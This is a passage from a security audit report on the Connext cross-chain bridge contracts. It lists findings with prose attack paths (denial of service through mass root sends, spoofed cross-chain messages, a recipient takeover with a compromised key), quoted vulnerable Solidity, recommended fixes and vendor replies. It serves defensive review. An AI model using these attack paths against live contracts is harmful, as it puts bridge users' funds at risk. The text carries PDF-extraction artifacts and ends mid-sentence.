+5.1.10 Large number of inbound roots can DOS the RootManager Severity: High Risk Context: RootManager.sol#L154-L163 Description: It is possible to perform a DOS against the RootManager by exploiting the dequeueVerified function or insert function of the RootManager.sol. The following describes the possible attack path: 1. Assume that a malicious user calls the permissionless GnosisSpokeConnector.send function 1000 times (or any number of times that will cause an Out-of-Gas error later) within a single transaction/block on Gnosis causing a large number of Gnosis's outboundRoots to be forwarded to GnosisHubConnector on Ethereum. 2. Since the 1000 outboundRoots were sent at the same transaction/block earlier, all of them should arrive at the GnosisHubConnector within the same block/transaction on Ethereum. 13 3. For each of the 1000 outboundRoots received, the GnosisHubConnector.processMessage function will be triggered to process it, which will in turn call the RootManager.aggregate function to add the received out- boundRoot into the pendingInboundRoots queue. As a result, 1000 outboundRoots with the same commit- Block will be added to the pendingInboundRoots queue. 4. After the delay period, the RootManager.propagate function will be triggered. The function will call the dequeueVerified function to dequeue 1000 verified outboundRoots from the pendingInboundRoots queue by looping through the queue. This might result in an Out-of-Gas error and cause a revert. 5. If the above dequeueVerified function does not revert, the RootManager.propagate function will attempt to insert 1000 verified outboundRoots to the aggregated Merkle tree, which might also result in an Out-of-Gas error and cause a revert. If the RootManager.propagate function reverts when called, the latest aggregated Merkle root cannot be forwarded to the spokes. As a result, none of the messages can be proven and processed on the destination chains. Note: the processing on the Hub (which is on mainnet) can also become very expensive, as the mainnet usually as a far higher gas cost than the Spoke. Recommendation: Both solutions should be implemented to sufficiently mitigate this issue. 1. Place restrictions on the SpokeConnector's send function. The send function should be restricted so that the domain's outbound root will only be forwarded to the hub when the following conditions are met: • If the last root sent is different from the current root to be sent • After the execution interval has lapsed (e.g. only able to trigger the send function once every few minutes) - This is to prevent a malicious user from bypassing the first measure (lastRootSent != out- boundRoot) by sending a cheap message to trigger the dispatch function to change the outboundRoot to a new one before calling the send function 2. Bound the number of outbound roots that can be aggregated per call, and allow them to be processed in batches (if needed) Connext: Solved in PR 2199 and PR 2545. Spearbit: Verified. +5.1.11 Missing mirrorConnector check on Optimism hub connector Severity: High Risk Context: OptimismHubConnector.sol#L69-L121 Description: processMessageFromRoot() calls _processMessage() to process messages for the "fast" path. But _processMessage() can also be called by the AMB in the slow path. The second call to _processMessage() is not necessary (and could double process the message, which luckily is prevented via the processed[] mapping). The second call (from the AMB directly to _processMessage()) also doesn't properly verify the origin of the message, which might allow the insertion of fraudulent messages. 14 function processMessageFromRoot(...) ... { ... _processMessage(abi.encode(_data)); ... } function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, "!length"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); } // otherwise root was already sent to root manager } Recommendation: Remove the second path. Connext: Solved in PR 2447. Spearbit: Verified. +5.1.12 Add _mirrorConnector to _sendMessage of BaseMultichain Severity: High Risk Context: BaseMultichain.sol#L39-L47 Description: The function _sendMessage() of BaseMultichain sends the message to the address of the _amb. This doesn't seem right as the first parameter is the target contract to interact with according to multichain cross- chain. This should probably be the _mirrorConnector. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable ... ); } Recommendation: Doublecheck the conclusion and change the code to: - function _sendMessage(address _amb, bytes memory _data) ... { + function _sendMessage(address _amb, address _mirrorConnector, bytes memory _data) ... { Multichain(_amb).anyCall( _amb, _mirrorConnector ... - + } ); Connext: Solved in PR 2386. Spearbit: Verified. 15 +5.1.13 Unauthorized access to change acceptanceDelay Severity: High Risk Context: DiamondInit.sol#L35-L40 Description: The acceptanceDelay along with supportedInterfaces[] can be set by any user without the need of any Authorization once the init function of DiamondInit has been called and set. This is happening since caller checks (LibDiamond.enforceIsContractOwner();) are missing for these fields. Since acceptanceDelay defines the time post which certain action could be executed, setting a very large value could DOS the system (new owner cannot be set) and setting very low value could make changes without consid- eration time (Setting/Renounce Admin, Disable whitelisting etc at ProposedOwnableFacet.sol ) Recommendation: Change the function implementation as shown below: LibDiamond.DiamondStorage storage ds = LibDiamond.diamondStorage(); ds.supportedInterfaces[type(IERC165).interfaceId] = true; - ds.supportedInterfaces[type(IDiamondCut).interfaceId] = true; - ds.supportedInterfaces[type(IDiamondLoupe).interfaceId] = true; - ds.supportedInterfaces[type(IProposedOwnable).interfaceId] = true; - ds.acceptanceDelay = _acceptanceDelay; - if (!s.initialized) { ... ds.supportedInterfaces[type(IERC165).interfaceId] = true; ds.supportedInterfaces[type(IDiamondCut).interfaceId] = true; ds.supportedInterfaces[type(IDiamondLoupe).interfaceId] = true; ds.supportedInterfaces[type(IProposedOwnable).interfaceId] = true; ds.acceptanceDelay = _acceptanceDelay; ... + + + + + } Connext: Fixed in PR 2393. Spearbit: Verified. +5.1.14 Messages destined for ZkSync cannot be processed Severity: High Risk Context: ZkSyncHubConnector.sol#L49-L72 Description: For ZkSync chain, L2 to L1 communication is free, but L1 to L2 communication requires a certain amount of ETH to be supplied to cover the base cost of the transaction (including the _l2Value) + layer 2 operator tip. The _sendMessage function of ZkSyncHubConnector.sol relies on the IZkSync(AMB).requestL2Transaction function to send messages from L1 to L2. However, the requestL2Transaction call will always fail because no ETH is supplied to the transaction (msg.value is zero). As a result, the ZkSync's hub connector on Ethereum cannot forward the latest aggregated Merkle root to the ZkSync's spoke connector on ZkSync chain. Thus, any message destined for ZkSync chain cannot be processed since incoming messages cannot be proven without the latest aggregated Merkle root. 16 function _sendMessage(bytes memory _data) internal override { // Should always be dispatching the aggregate root require(_data.length == 32, "!length"); // Get the calldata bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); // Dispatch message // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#structure](https://v2-docs.zksync.io/d ,! ev/developer-guides/Bridging/l1-l2.html#structure) // calling L2 smart contract from L1 Example contract // note: msg.value must be passed in and can be retrieved from the AMB view function ,! `l2TransactionBaseCost` c // [v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in-your-proje ct](https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in- your-project) c c ,! ,! IZkSync(AMB).requestL2Transaction{value: msg.value}( // The address of the L2 contract to call mirrorConnector, // We pass no ETH with the call 0, // Encoding the calldata for the execute _calldata, // Ergs limit 10000, // factory dependencies new bytes[]0 ); } Additionally, the ZkSync's hub connector contract needs to be loaded with ETH so that it can forward the appro- priate amount of ETH when calling the ZkSync's requestL2Transaction. However, it is not possible to do so because no receive(), fallback or payable function has been implemented within the contract and its parent contracts for accepting ETH. Recommendation: Ensure that ETH can be sent to the contract and appropriate amount of ETH is supplied when sending messages from L1 to L2 via the ZkSync's requestL2Transaction call. Connext: Solved in PR 2407 and PR 2443. Spearbit: Verified. +5.1.15 Cross-chain messaging via Multichain protocol will fail Severity: High Risk Context: BaseMultichain.sol#L39-L47 Description: Multichain v6 is supported by Connext for cross-chain messaging. The _sendMessage function of BaseMultichain.sol relies on Multichain's anyCall for cross-chain messaging. Per the Anycall V6 documentation, a gas fee for transaction execution needs to be paid either on the source or destination chain when an anyCall is called. However, the anyCall is called without consideration of the gas fee within the connectors, and thus the anyCall will always fail. Since Multichain's hub and spoke connectors are unable to send messages, cross-chain messaging using Multichain within Connext will not work. 17 function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable _data, address(0), // fallback address on origin chain MIRROR_CHAIN_ID, 0 // fee paid on origin chain ); } Additionally, for the payment of the execution gas fee, a project can choose to implement either of the following methods: • Pay on the source chain by depositing the gas fee to the caller contracts. • Pay on the destination chain by depositing the gas fee to Multichain's anyCall contract at the destination chain. If Connext decides to pay the gas fee on the source chain, they would need to deposit some ETH to the connector contracts. However, it is not possible because no receive(), fallback or payable function has been implemented within the contracts and their parent contracts for accepting ETH. Recommendation: Ensure that the gas fee is paid when making an anyCall. If the execution gas fee should be paid on the source chain, ensure that the connector contracts can accept ETH. Connext: Solved in PR 2421. Spearbit: Verified. 5.2 Medium Risk +5.2.1 _domainSeparatorV4() not updated after name/symbol change Severity: Medium Risk Context: BridgeToken.sol#L58-L63, OZERC20.sol#L382-L388, OZERC20.sol#L348-L369, draft-EIP712.sol, EIP712.sol#L69-L75, EIP712.sol#L100-L102 Description: The BridgeToken allows updating the name and symbol of a token. However the _CACHED_DOMAIN_- SEPARATOR (of EIP712) isn't updated. This means that permit(), which uses _hashTypedDataV4() and _CACHED_- DOMAIN_SEPARATOR, still uses the old value. On the other hand DOMAIN_SEPARATOR() is updated. Both and especially their combination can give unexpected results. BridgeToken.sol function setDetails(string calldata _newName, string calldata _newSymbol) external override onlyOwner { // careful with naming convention change here token.name = _newName; token.symbol = _newSymbol; emit UpdateDetails(_newName, _newSymbol); } OZERC20.sol 18 function DOMAIN_SEPARATOR() external view override returns (bytes32) { // See {EIP712._buildDomainSeparator} return keccak256( abi.encode(_TYPE_HASH, keccak256(abi.encode(token.name)), _HASHED_VERSION, block.chainid, ,! address(this)) ); } function permit(...) ... { ... bytes32 _hash = _hashTypedDataV4(_structHash); ... } draft-EIP712.sol import "./EIP712.sol"; EIP712.sol function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } } Recommendation: Make the implementation of DOMAIN_SEPARATOR() and _domainSeparatorV4() the same. Decide on using cached versions of the domain separator. See also issue "EIP712 domain separator can be cached" Connext: Solved in PR 2350. Spearbit: Verified. +5.2.2 diamondCut() allows re-execution of old updates Severity: Medium Risk Context: LibDiamond.sol#L112-L115 Description: Once diamondCut() is executed, ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _- init, _calldata))] is not reset to zero. This means the contract owner can rerun the old updates again without any delay by executing diamondCut() function. Assume the following: diamondCut() function is executed to update the facet selector with version_2 A bug is found in ver- sion_2 and it is rolled back Owner can still execute diamondCut() function which will again update the facet selector to version 2 since ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is still valid Recommendation: Reset ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] to zero as shown below: 19 function diamondCut( IDiamondCut.FacetCut[] memory _diamondCut, address _init, bytes memory _calldata ) internal { ... if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time <= block.timestamp, "LibDiamond: delay not elapsed"); } ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] = 0; + ... } Connext: Fix in PR 2222. Spearbit: Verified. +5.2.3 User may not be able to override slippage on destination Severity: Medium Risk Context: BridgeFacet.sol#L741-L746 Description: If BridgeFacet.execute() is executed before BridgeFacet.forceUpdateSlippage(), user won't be able to update slippage on the destination chain. In this case, the slippage specified on the source chain is used. Due to different conditions on these chains, a user may want to specify different slippage values. This can result in user loss, as a slippage higher than necessary will result the swap trade being sandwiched. Recommendation: xcall() can take different parameters for source and destination slippage: function xcall( uint32 _destination, address _to, address _asset, address _delegate, uint256 _amount, uint256 _slippage, uint256 _sourceSlippage, uint256 _destinationslippage, bytes calldata _callData - + + ) external payable returns (bytes32); Then TransferInfo params should be encoded with _destionationSlippage and _sourceSlippage should be passed separately to _xcall(). Connext: We previously had the slippage implemented as separate values, but decided to change it back for a couple of reasons: 1. Since the messages chains have variable latency, the destinationChainSlippage would be hard to predict at the time of xcall, especially for authenticated messages. users can override this using forceUpdateS- lippage, but it requires an additional transaction 2. Adding two parameters to the interface clutters it, and we strove to make the xcall interface as minimal as possible so the developer experience has the lowest necessary overhead Spearbit: Acknowledged. If you see this issue after launch, you can also consider adding an argument forceUp- dateSlippageOnDestination in xcall(). Now unless user calls forceUpdateSlippage() on destination (identi- fied by some state variable), transfer on destination is now allowed to be completed. This is a complex solution so only recommended if you anticipate this being an issue in production. It also depends on how quickly the transfers on destination is completed. 20 +5.2.4 Do not rely on token balance to determine when cap is reached Severity: Medium Risk Context: BridgeFacet.sol#L492-L495, RoutersFacet.sol#L556-L559 Description: Connext Diamond defines a cap on each token. Any transfer making the total token balance more than the cap is reverted. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Anyone can send tokens to Connext Diamond to artificially increase the custodied amount since it depends on the token balance. This can be an expensive attack but it can become viable if price of a token (including next assets) drops. Recommendation: Do not rely on token balance to determine custodied amount. Instead, consider maintaining the custodied amount whenever assets are transferred in or out via AssetLogic's handleIncomingAsset() and handleOutgoingAsset(). With this change, any token transfer in and out of Connext should be done via these functions to properly maintain the custodied amount. Note: Also consider the issue "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity" when applying the recommendation. Connext: Solved in PR 2444. Spearbit: Verified. +5.2.5 Router recipient can be configured more than once Severity: Medium Risk Context: RoutersFacet.sol#L401 Description: The comments from the setRouterRecipient function mentioned that the router should only be able to set the recipient once. Otherwise, no problem is solved. However, based on the current implementation, it is possible for the router to set its recipient more than once. /** File: RoutersFacet.sol 394: 395: 396: 397: 398: 399: 400: 401: * @notice Sets the designated recipient for a router * @dev Router should only be able to set this once otherwise if router key compromised, * no problem is solved since attacker could just update recipient * @param router Router address to set recipient * @param recipient Recipient Address to set to router */ function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { Let's assume that during router setup, the setupRouter function is being called and the owner is set to Alice's first EOA (0x123), and the recipient is set to Alice's second EOA (0x456). Although the comment mentioned that the setRouterRecipient should only be set once, this is not true because this function will only revert if the _- prevRecipient == recipient. As long as the new recipient is not the same as the previous recipient, the function will happily accept the new recipient. Therefore, if the router's signing key is compromised by Bob (attacker), he could call the setRouterRecipient function to change the new recipient to his personal EOA and drain the funds within the router. The setRouterRecipient function is protected by onlyRouterOwner modifier. Since Bob's has the compromised router's signing key, he will be able to pass this validation check. 21 /** File: RoutersFacet.sol 157: 158: 159: 160: 161: 162: 163: 164: 165: _; } * @notice Asserts caller is the router owner (if set) or the router itself */ modifier onlyRouterOwner(address _router) { address owner = s.routerPermissionInfo.routerOwners[_router]; if (!((owner == address(0) && msg.sender == _router) || owner == msg.sender)) revert RoutersFacet__onlyRouterOwner_notRouterOwner(); The second validation is at Line 404, which checks if the new recipient is not the same as the previous recipient. The recipient variable is set to Bob's EOA wallet, while _prevRecipient variable is set to Alice's second EOA (0x456). Therefore, the condition at Line 404 is False, and it will not revert. So Bob successfully set the recipient to his EOA at Line 407. File: RoutersFacet.sol 401: 402: 403: 404: 405: 406: 407: function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { // Check recipient is changing address _prevRecipient = s.routerPermissionInfo.routerRecipients[router]; if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient(); // Set new recipient s.routerPermissionInfo.routerRecipients[router] = recipient; Per the Github discussion, the motivation for such a design is the following: If a routers signing key is compromised, the attacker could drain the liquidity stored on the contract and send it to any specified address. This effectively means the key is in control of all unused liquidity on chain, which prevents router operators from adding large amounts of liquidity directly to the contract. Routers should be able to delegate the safe withdrawal address of any unused liquidity, creating a separation of concerns between router key and liquidity safety. In summary, the team is trying to create a separation of concerns between router key and liquidity safety. With the current implementation, there is no security benefit of segregating the router owner role and recipient role unless the router owner has been burned (e.g. set to address zero). Because once the router's signing key is compromised, the attacker can change the recipient anyway. The security benefits of separation of concerns will only be achieved if the recipient can truly be set only once. Recommendation: If the intention is to only allow the router owner to set the recipient once and not allow them to change it afterward, then the code should be as follows. function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) { // Check recipient is changing address _prevRecipient = s.routerPermissionInfo.routerRecipients[router]; if (_prevRecipient != address(0)) revert RoutersFacet__setRouterRecipient_RecipientAlreadySet(); if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient(); // Set new recipient s.routerPermissionInfo.routerRecipients[router] = recipient; // Emit event emit RouterRecipientSet(router, _prevRecipient, recipient); + - } The above implementation will always revert as long as the recipient address has already been set. Connext: Solved in PR 2413. Spearbit: Verified. 22 +5.2.6 The set of tokens in an internal swap pool cannot be updated Severity: Medium Risk Context: SwapAdminFacet.sol#L109-L119 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter) the _pooledTo- kens or the set of tokens used in this stable swap pool cannot be updated. Now the s.swapStorages[_key] pools are used in other facets for assets that have the hash of their canonical token id and canonical domain equal to _key, for example when we need to swap between a local and adopted asset or when a user provides liquidity or interact with other external endpoints of StableSwapFacet. If the submitted set of tokens to this pool _pooledTokens beside the local and adopted token corresponding to _key include some other bad/malicious tokens, users' funds can be at risk in the pool in question. If this happens, we need to pause the protocol, push an update, and initializeSwap again. Recommendation: Document the procedure on how _pooledTokens is selected and submitted to initial- izeSwap to lower the risk of introducing potentially bad/malicious tokens into the system. Connext: Solved in PR 2354. Spearbit: Verified. +5.2.7 An incorrect decimal supplied to initializeSwap for a token cannot be corrected Severity: Medium Risk Context: SwapAdminFacet.sol#L109-L119 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter) the decimal precisions per tokens, and therefore tokenPrecisionMultipliers cannot be changed. If the supplied decimals also include a wrong value, it would cause incorrect calculation when a swap is being made and currently there is no update mechanism for tokenPrecisionMultipliers nor a mechanism for removing the swapStorages[_key]. Recommendation: Add a restricted endpoint for updating the tokenPrecisionMultipliers for a token in an internal swap pool in case a mistake has been made when providing the decimals. Connext: We will remove the swap in case we made a mistake when initializing the swap pool, because we have to update token balances and adminFees in swap object when updating tokenPrecisionMultipliers. Solved in PR 2354. Spearbit: Verified. +5.2.8 Presence of delegate not enforced Severity: Medium Risk Context: BridgeFacet.sol#L395-L414, BridgeFacet.sol#L563-L567, BridgeFacet.sol#L337-L369 Description: A delegate address on the destination chain can be used to fix stuck transactions by changing the slippage limits and by re-executing transactions. However, the presence of a delegate address isn't checked in _xcall(). Note: set to medium risk because tokens could get lost 23 function forceUpdateSlippage(TransferInfo calldata _params, uint256 _slippage) external ,! onlyDelegate(_params) { ... } function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { (bytes32 transferId, DestinationTransferStatus status) = _executeSanityChecks(_args); ... } function _executeSanityChecks(ExecuteArgs calldata _args) private view returns (bytes32, ,! DestinationTransferStatus) { // If the sender is not approved relayer, revert if (!s.approvedRelayers[msg.sender] && msg.sender != _args.params.delegate) { revert BridgeFacet__execute_unapprovedSender(); } } Recommendation: Enforce the presence of a delegate address in _xcall(). Or at least document the behavior explicitly. Connext: Yes, it's always going to be necessary to have a delegate if you want to have a strategy for handling destination-side slippage conditions being unfavorable. If you don't have one you are taking on the bet that un- favorable slippage conditions won't be maintained indefinitely. Some groups see having any EOA or multisig that can impact these parameters as a huge no-no, and requiring one to be defined would be a nonstarter for them. So we allow to not provide an option on that front, even if it is more risky and could lead to funds being frozen in transit. We should add more clarity around this in the documentation though. Spearbit: Acknowledged. +5.2.9 Relayer could lose funds Severity: Medium Risk Context: BridgeFacet.sol#L828-L835 Description: The xReceive function on the receiver side can contain unreliable code which Relayer is unaware of. In the future, more relayers will participate in completing the transaction. Consider the following scenario: 1. Say that Relayer A executes the xReceive function on receiver side. 2. In the xReceive function, a call to withdraw function in a foreign contract is made where Relayer A is holding some balance. 3. If this foreign contract is checking tx.origin (say deposit/withdrawal were done via third party), then Relayer A's funds will be withdrawn without his permission (since tx.origin will be the Relayer). Recommendation: Relayers should be advised to use an untouched wallet address so that foreign code interac- tion cannot harm them. Connext: To be documented, relayers EOA should be single-purpose. Spearbit: Acknowledged. 24 +5.2.10 TypedMemView.sameType does not use the correct right shift value to compare two bytes29s Severity: Medium Risk Context: TypedMemView.sol#L402 Description: The function sameType should shift 2 x 12 + 3 bytes to access the type flag (TTTTTTTTTT) when comparing it to 0. This is due to the fact that when using bytes29 type in bitwise operations and also comparisons to 0, a paramater of type bytes29 is zero padded from the right so that it fits into a uint256 under the hood. 0x TTTTTTTTTT AAAAAAAAAAAAAAAAAAAAAAAA LLLLLLLLLLLLLLLLLLLLLLLL 00 00 00 Currently, sameType only shifts the xored value 2 x 12 bytes so the comparison compares the type flag and the 3 leading bytes of memory address in the packing specified below: // First 5 bytes are a type flag. // - ff_ffff_fffe is reserved for unknown type. // - ff_ffff_ffff is reserved for invalid types/errors. // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The function is not used in the codebase but can pose an important issue if incorporated into the project in the future. function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> (2 * TWELVE_BYTES) == 0; } Recommendation: Change sameType() to take the zero padding into account: uint256 private constant TWENTY_SEVEN_BYTES = 8 * 27; ... function sameType(bytes29 left, bytes29 right) internal pure returns (bool) { return (left ^ right) >> TWENTY_SEVEN_BYTES == 0; } See summa-tx/memview-sol/pull/10 for a solution. We also recommend leaving a header comment indicating the source of libraries/contracts used. Connext: Solved in PR 2394. Spearbit: Verified. +5.2.11 Incorrect formula for the scaled amplification coefficient in NatSpec comments Severity: Medium Risk Context: • StableSwapFacet.sol#L70 • SwapAdminFacet.sol#L103 • StableSwap.sol#L64 • StableSwap.sol#L143 • AmplificationUtils.sol#L24 • SwapUtils.sol#L62 • SwapUtils.sol#L248 • SwapUtils.sol#L304 25 • SwapUtilsExternal.sol#L54 • SwapUtilsExternal.sol#L127 • SwapUtilsExternal.sol#L285 • SwapUtilsExternal.sol#L341 Description: In the context above, the scaled amplification coefficient a is described by the formula An(n (cid:0) 1) where A is the actual amplification coefficient in the stable swap invariant equation for n tokens. * @param a the amplification coefficient * n * (n - 1) ... The actual adjusted/scaled amplification coefficient would need to be Ann(cid:0)1 and not An(n (cid:0) 1), otherwise, most of the calculations done when swapping between 2 tokens in a pool with more than 2 tokens would be wrong. For the special case of n = 2, those values are actually equal 22(cid:0)1 = 2 = 2 (cid:1) 1. So for swaps or pools that involve only 2 tokens, the issue in the comment is not so critical. But if the number of tokens are more than 2, then we need to make sure we calculate and feed the right parameter to AppStorage.swapStorages.{initial, future}A Recommendation: Fix the NatSpec comments to: * @param a the amplification coefficient * n ** (n - 1) ... And make sure any values of a for init functions or as an input to swap functions are scaled using nn(cid:0)1 from the amplification coefficient. Looks like the original source for SwapUtils is from here: SwapUtils.sol which is a Solidity rewrite of the curve finance pool template contracts in Vyper: pool-templates It is recommend adding header NatSpec comments and mentioning authors or original/modified sources for all files including the ones mentioned in this issue. Connext: Solved in PR 2353. Spearbit: Verified. +5.2.12 RootManager.propagate does not operate in a fail-safe manner Severity: Medium Risk Context: RootManager.sol#L147-L173 Description: A bridge failure on one of the supported chains will cause the entire messaging network to break down. When the RootManager.propagate function is called, it will loop through the hub connector of all six chains (Ar- bitrum, Gnosis, Multichain, Optimism, Polygon, ZKSync) and attempt to send over the latest aggregated root by making a function call to the respective chain's AMB contract. There is a tight dependency between the chain's AMB and hub connector. The problem is that if one of the function calls to the chain's AMB contract reverts (e.g. one of the bridges is paused), the entire RootManager.propagate function will revert, and the messaging network will stop working until someone figure out the problem and manually removes the problematic hub connector. As Connext grows, the number of chains supported will increase, and the risk of this issue occurring will also increase. Recommendation: The RootManager.propagate function should operate in a fail-safe manner (e.g. using try- catch or address.call). Chain's AMB contracts are considered external third-party and beyond Connext control. Thus, the RootManager.propagate function should not assume that function calls to these third-party bridge con- tracts will always succeed and will not revert. Connext: Solved in PR 2430. Spearbit: Verified. 26 +5.2.13 Arborist once whitelisted cannot be removed Severity: Medium Risk Context: Merkle.sol#L93-L97 Description: Arborist has the power to write over the Merkle root. In case Arborist starts misbehaving (compro- mised or security issue) then there is no way to remove this Arborist from the whitelist. Recommendation: Revise the setArborist function to tweak arborists whitelisting status function setArborist(address newArborist, bool status) external onlyOwner { if (newArborist == address(0)) revert MerkleTreeManager__setArborist_zeroAddress(); if (arborists[newArborist]) revert MerkleTreeManager__setArborist_alreadyArborist(); arborists[newArborist] = status; } Connext: Solved in PR 2426. Spearbit: Verified. +5.2.14 WatcherManager is not set correctly Severity: Medium Risk Context: WatcherClient.sol#L36-L39 Description: The setWatcherManager function missed to actually update the watcherManager, instead it is just emitting an event mentioning that Watcher Manager is updated when it is not. This could become a problem once new modules are added/revised in WatcherManager contract and Watcher- Client wants to use this upgraded WatcherManager. WatcherClient will be forced to use the outdated Watcher- Manager contract code. Recommendation: Revise the setWatcherManager function as shown below: function setWatcherManager(address _watcherManager) external onlyOwner { require(_watcherManager != address(watcherManager), "already watcher manager"); watcherManager = WatcherManager(_watcherManager); emit WatcherManagerChanged(_watcherManager); + } Connext: Fixed in PR 2432. Spearbit: Verified. +5.2.15 Check __GAPs Severity: Medium Risk LPToken.sol#L16, OwnerPausableUpgradeable.sol#L16, StableSwap.sol#L39, Merkle.sol#L37, Context: ProposedOwnable.sol#L193 Description: All __GAPs have the same size, while the different contracts have a different number of storage variables. If the __GAP size isn't logical it is more difficult to maintain the code. Note: set to a risk rating of medium because the probably of something going wrong with future upgrades is low to medium, and the impact of mistakes would be medium to high. LPToken.sol: uint256[49] private __GAP; // should probably be 50 OwnerPausableUpgradeable.sol: uint256[49] private __GAP; // should probably be 50 uint256[49] private __GAP; // should probably be 48 StableSwap.sol: uint256[49] private __GAP; // should probably be 48 Merkle.sol: uint256[49] private __GAP; // should probably be 47 ProposedOwnable.sol: 27 Recommendation: Check and update the __GAPs of all the contracts. Perhaps the __GAP of ProposedOwnable- Upgradeable should be moved to ProposedOwnable. Connext: Solved in PR 2342. Spearbit: Verified. +5.2.16 Message can be delivered out of order Severity: Medium Risk Context: SpokeConnector.sol#L330-L376 Description: Messages can be delivered out of order on the spoke. Anyone can call the permissionless prove- AndProcess to process the messages in any order they want. A malicious user can force the spoke to process messages in a way that is beneficial to them (e.g., front-run). Recommendation: Ensure that messages are always processed in order. Otherwise, if the risk is deemed ac- ceptable, update the documentation to highlight that messages can be delivered out of order and that it is up to Connext users to protect themselves against this. Connext: This problem reminds me of MEV around sequencing when building blocks. I think enforcing the mes- sage order would create additional complex problems. What if a certain message couldn't be processed, because the stableswap slippage had moved beyond the user-set slippage tolerance? In that case, all following messages would be beholden to that one user coming back to make sure they update their slippage tolerance (creating an isAlive assumption). What if that user doesn't want to increase their slippage tolerance - they'd rather wait out market conditions on their own time? They hold up the entire queue, a queue of quite possibly unrelated txs. It's true that a relayer could choose to relay certain txs ahead of others. They could be biased towards their own transfers, and do some MEV/frontrunning this way... but any frontrunning that the relayer could do, anyone could do, simply by looking at the transaction in the mempool and frontrunning or sandwiching it for profit. Even if the relayer used flashbots, any observer could examine our subgraphs to see inbound txs. The relayer could definitely execute such MEV a bit more comfortably (by guaranteeing their frontrun goes through), but that slight benefit/advantage of their role in the system is not worth the UX tradeoffs involved in serializing here - which would almost guarantee occasional spots of traffic/congestion. Spearbit: Acknowledged. +5.2.17 Extra checks in _verifySender() of GnosisBase Severity: Medium Risk Context: GnosisBase.sol#L16-L19 Description: According to the Gnosis bridge documentation the source chain id should also be checked using messageSourceChainId(). This is because in the future the same arbitrary message bridge contract could handle requests from different chains. If a malicious actor would be able to have access to the contract at mirrorConnector on a to-be-supported chain that is not the MIRROR_DOMAIN, they can send an arbitrary root to this mainnet/L1 hub connector which the con- nector would mark it as coming from the MIRROR_DOMAIN. So the attacker can spoof/forge function calls and asset transfers by creating a payload root and using this along with their access to mirrorConnector on chain to send a cross-chain processMessage to the Gnosis hub connector and after they can use their payload root and proofs to forge/spoof transfers on the L1 chain. Although it is unlikely that any other party could add a contract with the same address as _amb on another chain, it is safer to add additional checks. function _verifySender(address _amb, address _expected) internal view returns (bool) { require(msg.sender == _amb, "!bridge"); return GnosisAmb(_amb).messageSender() == _expected; } 28 Recommendation: In function _verifySender() add a check to verify messageSourceChainId() == MIRROR_- DOMAIN. Note: this will probably require adding an extra parameter to _verifySender(). Connext: The chainId != domain, so has to be stored separately. Going to use sourceChainId() instead of the messageSourceChainId() as there is no documentation of what the bytes32 should represent instead of uint256. Solved in PR. Spearbit: Verified. +5.2.18 Absence of Minimum delayBlocks Severity: Medium Risk Context: RootManager.sol#L102-106, SpokeConnector.sol#L218-L221 Description: Owner can accidentally set delayBlocks as 0 (or a very small delay block) which will collapse the whole fraud protection mechanism. Since there is no check for minimum delay before setting a new delay value so even a low value will be accepted by setDelayBlocks function function setDelayBlocks(uint256 _delayBlocks) public onlyOwner { require(_delayBlocks != delayBlocks, "!delayBlocks"); emit DelayBlocksUpdated(_delayBlocks, delayBlocks); delayBlocks = _delayBlocks; } Recommendation: Introduce a variable minDelay which tells the minimum possible delay allowed by the contract. Any attempt to change delay value using setDelayBlocks function should ensure that new delay is larger/equal to minDelay Connext: We could add a minimum for when delayBlocks is not 0, but that minimum will vary by chain / block time, so that minimum HAS to be configurable. We could add a separate configuration endpoint and make it so it takes 72 hours to change the delay blocks minimum, but that feels more like DAO functionality/responsibility. For that reason, going with "acknowledged". At the very least, users can visibly check what the delayBlocks are set to on-chain to make sure it's reasonable. Spearbit: Acknowledged +5.2.19 Add extra 0 checks in verifyAggregateRoot() and proveMessageRoot() Severity: Medium Risk Context: SpokeConnector.sol#L403-L422, SpokeConnector.sol#L456-L481 Description: The functions verifyAggregateRoot() and proveMessageRoot() verify and confirm roots. A root value of 0 is a special case. If this value would be allowed, then the functions could allow invalid roots to be passed. Currently the functions verifyAggregateRoot() and proveMessageRoot() don't explicitly verify the roots are not 0. 29 function verifyAggregateRoot(bytes32 _aggregateRoot) internal { if 